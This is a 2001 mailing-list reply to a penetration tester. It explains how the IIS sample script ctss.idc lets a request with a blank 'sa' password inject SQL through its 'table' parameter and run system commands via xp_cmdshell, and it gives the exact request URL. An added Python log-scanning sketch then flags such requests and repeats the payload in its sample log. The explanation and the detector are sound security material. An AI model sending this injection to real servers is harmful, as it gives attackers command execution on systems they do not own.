From: H D Moore (hdmsecureaustin.com)
Date: Tue Jul 31 2001 - 12:50:23 CDT


    mkilog.exe simply posts data to ctss.idc, which creates a table based on the
    parameters it gets:

    [ctss.idc]
    Datasource: %ds%
    Username: %user%
    Password: %pwd%
    Template: ct.htx
    SQLStatement:
    +create table %table% (
    +ClientHost varchar(50), username varchar(50),
    +LogTime datetime, service varchar( 20), machine varchar( 20),
    +serverip varchar( 50), processingtime int, bytesrecvd int,
    +bytessent int, servicestatus int, win32status int,
    +operation varchar( 200), target varchar(200), parameters text )

    If you pass a correct DataSource, User, and Password (LocalServer, sa, blank
    password for locally installed servers), then change the table to:

    bogustable(bleh int); EXEC master..xp_cmdshell("cmd.exe /c echo 0wned");--

    You can use it to run system commands. In this case, the actual query you
    would send is (lines probably wrapped):

    /scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=bogustable(bleh
    int);EXEC+master..xp_cmdshell("cmd.exe+/c echo+0wned");--

    For every query you run you have to create another garbage table, so remember
    to clean up all those bogus tables when you are done.

    For some reason SQL Server 6.5 limits your command parameter to 30 characters
    when executed this way (which is _really_ annoying), I haven't been able to
    track down why yet. Good luck!

    -HD

    http://www.digitaloffense.net (play)
    http://www.digitaldefense.net (work)

    On Tuesday 31 July 2001 06:48 am, César González wrote:
    > Hello all,
    >
    > I am doing a penetration test, and some vulnerability scanners alert
    > about the script mkilog.exe. More exactly, Nessus said the following:
    >
    > The CGI /scripts/tools/mkilog.exe is present.
    >
    > This CGI allows an attacker to view and modify SQL database
    > contents.
    >
    > No SecurityFocus links, CVE advisory, etc. I have searched the most popular
    > security search engines but nothing appears. Any help will be appreciated.
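
A detection sketch for the requests described in this message, added here as an example and not part of the original post or thread: it flags access-log lines that touch the two script paths and marks those whose `table` parameter is anything other than a plain identifier. The log lines are constructed, and the Common Log Format layout, the function names and the 30-character identifier cap are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Paths named in the post; compared in lower case because IIS paths are case-insensitive.
SUSPECT_PATHS = ("/scripts/tools/ctss.idc", "/scripts/tools/mkilog.exe")
# The only shape that is safe inside "create table %table% (": one bare identifier.
# The 30-character cap is an assumed limit for this example.
PLAIN_IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,29}\Z")
# Request field of a Common Log Format line (assumed log layout).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>.+) HTTP/[\d.]+"')


def classify(line):
    """Return None, 'probe' or 'injection' for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path.lower() not in SUSPECT_PATHS:
        return None
    # Split on "&" only, so a ";" stays inside the value it belongs to.
    for pair in url.query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key).lower() == "table":
            if not PLAIN_IDENTIFIER.match(unquote_plus(value)):
                return "injection"
    # POST bodies are not logged, so a POST to these paths can only be a 'probe'.
    return "probe"


def scan(lines):
    """Return [(line_number, verdict)] for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Jul/2001:12:01:07 -0500] "GET /default.htm HTTP/1.0" 200 4110',
    '192.0.2.44 - - [31/Jul/2001:12:03:19 -0500] "GET /scripts/tools/mkilog.exe HTTP/1.0" 200 1893',
    '192.0.2.44 - - [31/Jul/2001:12:03:52 -0500] "GET /scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=weblog HTTP/1.0" 200 512',
    '192.0.2.44 - - [31/Jul/2001:12:04:30 -0500] "GET /Scripts/Tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=bogustable(bleh+int);EXEC+master..xp_cmdshell(%22cmd.exe+/c+echo+0wned%22);-- HTTP/1.0" 200 512',
    '192.0.2.44 - - [31/Jul/2001:12:05:02 -0500] "POST /scripts/tools/ctss.idc HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

A 'probe' verdict on a host that does not use these sample scripts is a reason to remove them from the web root; an 'injection' verdict calls for reviewing the database for unexpected tables.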
